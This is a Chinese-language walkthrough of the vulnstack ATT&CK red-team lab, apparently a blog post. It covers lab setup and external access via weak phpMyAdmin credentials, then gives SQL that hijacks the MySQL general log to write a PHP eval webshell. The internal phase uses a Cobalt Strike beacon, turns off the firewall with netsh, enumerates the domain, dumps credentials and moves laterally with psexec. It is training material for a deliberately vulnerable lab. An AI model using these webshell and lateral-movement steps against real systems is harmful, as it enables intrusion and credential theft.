环境下载

下载靶场环境,并导入虚拟机
分别是win2003、win7、winserver2008

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式
分配的地址是192.168.52.0

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2

win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)

**总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。**
win7:192.168.0.105、192.168.52.143
win2003:192.168.52.138
win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.105
2、扫描ip的端口,获得80和3306端口。

3、访问80端口
获得phpstudy探针,获得绝对路径,探测出数据库弱口令

 4、扫描192.168.0.105的目录

获得phpmyadmin目录

5、访问phpmyadmin
通过弱口令登录

6、通过日志写入webshell
SHOW VARIABLES LIKE '%general%' #查看日志

set global general_log = "ON" #开启日志记录

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

select "<?php eval($_POST['123'])?>"; #写入webshell

访问webshell

使用蚁剑连接木马

7、phpmyadmin的getshell方法

(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。
show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值
       如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出
       如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下
       如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制
在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件

(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径
        SHOW VARIABLES LIKE '%general%' #查看日志
        set global general_log = "ON" #开启日志记录
        set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件
        select "<?php eval($_POST['aaa']);?>"; #写入webshell

以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径

内网渗透

1、打开CS,生成监听器

2、创建木马程序,将目标上线cs

3、通过蚁剑将cs创建的木马上传

4、启动木马,上线cs

5、主机上线后

netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ipconfig #查看信息,发现双网卡

net user #查看用户

提权

net view #查看计算机列表,并且会将其他计算机列入CS

net config Workstation #查看当前计算机名、域、登录域等

net view /domain #查看域

net localgruop administrators #查看域管

net tasklist #查看进程列表,是否存在杀软

net dclist #查看域控列表

提取凭证

提取明文密码

创建smb监听器

psexec

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线

新网站

phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录

获得新网站

公告信息获得敏感信息

打开后台弱口令登录

通过新建文件上传木马

在蚁剑获取到上传的目录

访问木马

连接木马

ATT&CK实战系列(一)的更多相关文章

  1. ATT&CK实战系列 红队实战(一)————环境搭建

    首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...

  2. ATT&CK实战系列——红队实战(一)

    一.环境搭建 1.环境搭建测试 最近想要开始学习内网渗透,搜集了一些教程,准备先实验一个vulnstack靶机,熟悉一下内网渗透操作再学习基础知识. 靶场下载地址:http://vulnstack.q ...

  3. 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

    一.环境搭建 1.1 靶场下载 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码:  1qaz@WSX 1.2 环境配置 ...

  4. ATT&CK实战系列——红队实战(二)

    一.环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ DC IP:10.10.10.10OS:Windows 2012应用:A ...

  5. ATT&CK 实战 - 红日安全 vulnstack (一) 环境部署

    靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习.另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环.后续也会搭建真实APT实 ...

  6. ATT&CK 实战 - 红日安全 vulnstack (二) 环境部署(劝退水文)

    靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场简述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博 ...

  7. ATT&CK 实战 - 红日安全 vulnstack (一) 靶机渗透

    关于部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,后来发现内网主机还是PING不通VM1,索性三台主机全部配成NAT模式,按照WEB靶机 ...

  8. 内网横向渗透 之 ATT&CK系列一 之 拿下域控制器

    信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_lo ...

  9. 内网横向渗透 之 ATT&CK系列一 之 信息收集

    前言 靶机下载地址:ATT&CK 拓扑图: 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环.虚拟机默认密码为hongrisec@2019. 环境搭 ...

  10. Spark入门实战系列--9.Spark图计算GraphX介绍及实例

    [注]该系列文章以及使用到安装包/测试数据 可以在<倾情大奉送--Spark入门实战系列>获取 .GraphX介绍 1.1 GraphX应用背景 Spark GraphX是一个分布式图处理 ...

随机推荐

  1. Visual Studio 使用IISprofile进行远程部署

      ​

  2. 前端每日一知之BFC

    脑图在线链接 本文内容依据[js每日一题]公众号精彩文章总结而来

  3. 使用 .NET Core 实现一个自定义日志记录器

    目录 引言 1. 抽象包 1.1 定义日志记录接口 1.2 定义日志记录抽象类 1.3 表结构迁移 2. EntityFramework Core 的实现 2.1 数据库上下文 2.2 实现日志写入 ...

  4. PDFsharp 1.50

    PDFsharp 1.50 Preview Information - PDFsharp & MigraDoc PDFShapr 1.50 修复与改进 支持 Object Streams - ...

  5. django介绍及基本使用

    目录 一.python主流web框架 二.django简介 1.版本问题 2.运行django注意事项 三.django基本使用 1.下载模块 2.验证 3.常见命令 4.pycharm自动创建dja ...

  6. 渗透测试-前端加密分析之RSA+AES

    本文是高级前端加解密与验签实战的第8篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过RSA与AES加密来爆破登录. 由于RSA加解密有长度限制,以及解密速度等问题, ...

  7. 【Word】文献引用批量上标

    \[([0-9]{1,2})\]

  8. 【Linux】【专项突破】CentOS下软件安装

    目录 rpm yum软件仓库 配置文件 缓存处理 清理缓存 重构缓存 查询包的依赖关系 rpm # 普通下载安装 rpm -ivh 包名 # 更新 rpm -Uvh 包全名 # 查询 rpm -q 包 ...

  9. linux shell移植,sh不支持数组及bash移植

    查看此时系统shell ls -al /bin/sh Linux 操作系统缺省的 shell 是Bourne Again shell,它是 Bourne shell 的扩展,简称 Bash,与 Bou ...

  10. spring boot 配置多个DispatcherServlet

    传统的web项目,只需要在web.xml里配置多个即可,并且支持多个url-pattern 在spring boot中,我们默认无需配置,系统会自动装配一个,感兴趣的可以看下源码 org.spring ...